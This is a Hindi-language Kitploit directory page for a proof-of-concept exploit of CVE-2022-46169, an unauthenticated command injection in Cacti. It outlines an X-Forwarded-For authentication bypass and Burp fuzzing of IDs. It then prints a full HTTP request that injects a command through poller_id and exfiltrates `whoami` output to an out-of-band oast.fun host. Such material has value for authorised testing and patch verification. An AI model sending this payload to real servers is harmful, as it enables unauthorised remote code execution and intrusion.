Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-46169 — CVE-2022-46169 Cacti remote_agent.php अप्रमाणित कमांड इंजेक्शन। | Kitploit
उपकरण/GitHubGitHub/0xf4n9x/cve-2022-46169
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलप्रमाणीकरण
GitHub0xf4n9x/cve-2022-46169

CVE-2022-46169

CVE-2022-46169 Cacti remote_agent.php अप्रमाणित कमांड इंजेक्शन।

रिपॉजिटरी देखें
471223 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-46169

CVE-2022-46169 Cacti remote_agent.php में बिना प्रमाणीकरण के कमांड इंजेक्शन।

प्रमाणीकरण बाइपास

X-Forwarded-For हेडर जोड़कर प्रमाणीकरण को बाइपास करें, ध्यान दें कि इसका मान एक निश्चित मान नहीं है।

image

image

ब्रूट फोर्स

host_id और local_data_ids के मानों का फ़ज़ टेस्ट करने के लिए Burp Intruder का उपयोग करें।

image

image

आरसीई (RCE)

कमांड इंजेक्शन का बिंदु poller_id पैरामीटर है।

root@kitploit:~
GET /cacti/remote_agent.php?action=polldata&poller_id=;ping%20-c%202%20`whoami`.ccsy8s32vtc0000x5nagg8rkyboyyyyyc.oast.fun&host_id=2&local_data_ids[]=6 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For: 127.0.0.1


image

संदर्भ

  • https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf
टूल डाउनलोड करें